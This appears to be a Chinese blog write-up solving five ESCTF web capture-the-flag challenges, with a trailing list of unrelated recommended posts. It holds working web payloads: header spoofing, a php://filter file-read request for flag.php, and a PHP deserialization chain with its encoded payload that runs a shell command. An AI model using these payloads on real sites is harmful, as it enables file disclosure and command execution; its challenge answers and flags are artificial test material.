ESCTF-Web赛题WP

0x01-初次见面-怦然心动:your name?

随便输入一个字

根据提示可以看到 我们需要看源代码 直接 搜索 secret 关键字或者 ESCTF


flag

ESCTF{K1t0@@_iS_S0_HAPPy}


0x02-小k的请求

更安全的传参 post 参数为ESCTF 值为 love

自己的ip 同时还有个要求 是需要从度娘转过来 https://www.baidu.com/ 此时需要两个请求标头 一是X-Forwarded-For 和 Referer

flag

ESCTF{Have_@_Good_DAY_t0dAy}


0x03-传奇故事-多多包涵

发现url 中包含了k1t0.php 根据提示 flag.php 我们直接可以伪协议读取 文件

index.php?k1=php://filter/read/convert.base64-encode/resource=flag.php

base64 解码

PD9waHAKIkVTQ1RGe0sxdDBfSTJfYmlHX2hlck99IgogICAgPz4K

flag

ESCTF{K1t0_I2_biG_herO}

0x04-1+1真的好难

可以看到 传递了1+1的答案并且是用post传递的参数

根据页面提示:question1

我只是限制了不能从前端按钮传参 可以直接用hackbar

post参数:

question1=2&question2=3

flag

ESCTF{EXPLO_Re@Sec_RISK!!!}

0x05-喂,我不叫喂我叫k1t0

解答


<?php
class K1t0
{
    protected $k1="base64 f*";


}
class Breeze
{
    public $rce;
    public $str;

}
class QWQ
{
    public $p;


}
$a=new Breeze();
$a->str=new QWQ();
$a->str->p=new K1t0();

echo urlencode(serialize($a));

?>

在url中10000/?k1t0=O%3A6%3A%22Breeze%22%3A2%3A%7Bs%3A3%3A%22rce%22%3BN%3Bs%3A3%3A%22str%22%3BO%3A3%3A%22QWQ%22%3A1%3A%7Bs%3A1%3A%22p%22%3BO%3A4%3A%22K1t0%22%3A1%3A%7Bs%3A5%3A%22%00%2A%00k1%22%3Bs%3A9%3A%22base64+f%2A%22%3B%7D%7D%7D

得到RVNDVEZ7S0AhdDBfRVhQTE9yXzJSX1RlUU19Cg==

base64解码

flag

ESCTF{K@!t0_EXPLOr_2R_TeQM}

相关推荐

最近更新

  1. docker php8.1+nginx base 镜像 dockerfile 配置

    2024-03-26 06:12:08       98 阅读
  2. Could not load dynamic library ‘cudart64_100.dll‘

    2024-03-26 06:12:08       106 阅读
  3. 在Django里面运行非项目文件

    2024-03-26 06:12:08       87 阅读
  4. Python语言-面向对象

    2024-03-26 06:12:08       96 阅读

热门阅读

  1. springboot实现热搜后端elk

    2024-03-26 06:12:08       31 阅读
  2. oracle切换ADG后JVM组件查询报错ORA-29516处理

    2024-03-26 06:12:08       58 阅读
  3. mybatisplus如何拼接动态sql

    2024-03-26 06:12:08       45 阅读
  4. macOS - 安装 b2 (Jamfile)

    2024-03-26 06:12:08       42 阅读
  5. ffmpeg把一个平面视频,做成左右平面视频

    2024-03-26 06:12:08       41 阅读
  6. ffmpeg重点之时间戳,PTS、DTS、time_base

    2024-03-26 06:12:08       37 阅读